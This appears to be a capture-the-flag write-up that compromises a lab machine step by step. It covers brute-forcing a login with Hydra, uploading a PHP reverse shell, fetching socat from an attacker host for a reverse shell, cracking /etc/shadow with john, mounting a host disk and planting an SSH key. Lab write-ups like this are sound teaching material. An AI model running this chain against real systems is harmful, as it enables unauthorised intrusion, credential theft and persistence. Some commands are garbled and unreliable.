nmap -T5 -sV -p- 10.10.78.81
On the three web services, you have to parse the directories to see what can be interesting. Operation performed with Dirsearch
dirsearch -u 10.10.78.81 -x 403
dirsearch -u 10.10.78.81:8000 -x 403
dirsearch -u 10.10.78.81:8080 -x 400,401,403,404,500
Nothing conclusive appears.
We only go to the port 80 website, we have the possibility of recovering a hamlet.txt file, as well as information concerning Michael ‘ghost’ who seems to be obsessed with a man named Hamlet.
On port 8000, there is the same thing, or almost. Indeed, the text on hamlet seems to be the same as on port 80. It is in fact an iframe whose source is at this address : /repository/project/0/document/0/source/hamlet. txt
On port 8080, the site offers to connect in identifiers that we do not have.
Access to the FTP server is done with the anonymous account but, for obscure reasons, I could only access it from Firefox.
We retrieve firewall rules with the ufw.status file and password policy rules with the password-policy.md file
At this stage, the password-policy.md file is very interesting because it gives us the length and complexity of the password.
Using cewl and the hamet.txt file, we will create a password list.
cewl -m 12 –lowercase -w password_list.txt http://10.10.78.81/hamlet.txt
With this list of words of at least 12 characters, in lower case, we are going to bruteforce the login page with Hydra
hydra -V -l ghost -P test.txt 10.10.78.81 -s 8080 http-post-form -m “/login.html?-1.-loginForm:urlfragment=&username=^USER^&password=^PASS^&Login= Login:’Login failed'”
Once connected, you must create a new project. Then you have to add a document to it. Instead of a text file, we will put a reverse shell in PHP. It does not check the contents or the extension of the file.
In the documents tab, you can click on Browse to insert the reverse shell. The shell used is that of pentestmonkey available for direct download at this address. https://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
It only remains to find where it has been recorded. It should be remembered that on port 8000, we had found the location of the document hamlet.txt.
By replacing the 0 with 1 and hamlet.txt with shell.php, we can find our reverse_shell. The final address : http://10.10.78.81:8000/repository/project/1/document/1/source/shell.php
Before validating the link, you must set up a netcat listener
nc -nlvp 1234
Python not being installed, nor socat for that matter, it is quite difficult to enumerate the system. To counter this, I will download a socat binary and use it to upgrade the shell.
It must then be downloaded to the victim machine. WGET not being installed, you have to use CURL
curl -O http://10.11.38.124:8000/socat
With a web server on kali:
python3.9 -m http.server
Then do his two commands:
chmod +x socat
Listener on kali :
socat file:`tty`,raw,echo=0 tcp-listen:4444
Command on host :
/tmp/socat exec:’bash -li’,pty,stderr,setsid,sigint,sane tcp:10.11.38.124:4444
We are in a container, but we have the possibility to break the account password. The shadow file is accessible. After copying the contents of /etc/shadow and /etc/passwd you must use unshadow and johntheripper
shadow passwd shadow > shadow
john unshadow –format=crypt –wordlist=/usr/share/wordlists/rockyou.txt
Now that we are in the root account, we can do all the manipulations possible.
In /dev you can have a number of disks.
ls -al /dev/ | grep disk
As we can see there are several disks including xvda1 2 and 3.
Only xvda2 can be mounted in a folder. The other two can’t be.
Once we have mounted the xvda2s in the /mnt/xvda2_fake folder, we can retrieve the root flag. It is also possible to create a private ssh key and use it to connect to the system.
mount /dev/xvda2 /mnt/xvda2_fake/
Creation of an id_rsa key
copy id_rsa.pub to authorized_keys
echo ‘id_rsa.pub’ >> authorized_keys
chmod 600 id_rsa
ssh firstname.lastname@example.org -i id_rsa
That’s all folks
Thank you for taking the trouble to come to the site to read this Write-Up
I hope he has more of you and that he taught you new things.
Feel free to leave a comment or share this article